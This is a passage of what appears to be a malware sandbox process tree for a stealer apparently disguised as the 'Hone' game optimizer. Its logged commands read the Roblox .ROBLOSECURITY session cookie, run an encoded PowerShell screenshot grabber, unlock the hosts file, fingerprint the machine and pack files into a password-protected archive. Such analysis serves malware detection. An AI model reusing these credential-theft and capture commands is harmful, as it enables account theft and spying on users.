C:\Windows\system32\find.exefind "Intel"6⤵PID:4636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3168
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:1168
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f6⤵PID:3012
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f6⤵PID:3040
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f6⤵PID:4220
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Mouse" /v "MouseSensitivity" /t REG_SZ /d "10" /f6⤵PID:4248
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve" /t REG_BINARY /d "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000" /f6⤵PID:476
-
-
C:\Windows\system32\control.execontrol.exe desk.cpl,Settings,@Settings6⤵PID:560
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL desk.cpl,Settings,@Settings7⤵
- Checks computer location settings
PID:3524 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" ms-settings:display8⤵PID:2648
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Mouse" /v "SmoothMouseXCurve" /t REG_BINARY /d "0000000000000000C0CC0C0000000000809919000000000040662600000000000033330000000000" /f6⤵PID:2768
-
-
C:\Windows\system32\cmd.execmd /V:ON /C @echo off6⤵PID:1824
-
-
C:\Windows\system32\mode.comMode 65,166⤵PID:3332
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:524
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:3180
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:4064
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:3300
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:240
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1376
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:2888
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:2108
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:3408
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:1152
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:4632
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1368
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:3756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:2432
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:2972
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:1844
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:4472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:4532
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:1196
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:548
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:2708
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3924
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:872
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2988
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:4860
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:4312
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:1816
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4332
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:3964
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:816
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:544
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:4460
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:3196
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:992
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:116
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:1388
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:4228
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:2952
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:2860
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:2224
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:4724
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:2624
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:3248
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:2328
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:1644
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:460
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:4708
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:1544
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:1656
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:3560
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:4244
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:1204
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:4828
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:4540
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:772
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:1272
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:1508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4748
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:636
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1220 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline"5⤵PID:3244
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP"6⤵PID:2156
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:1312
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3400
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1436
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:2132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *"3⤵PID:712
-
C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *4⤵
- Executes dropped EXE
PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4312
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2532
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:1484
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1312
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4412
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
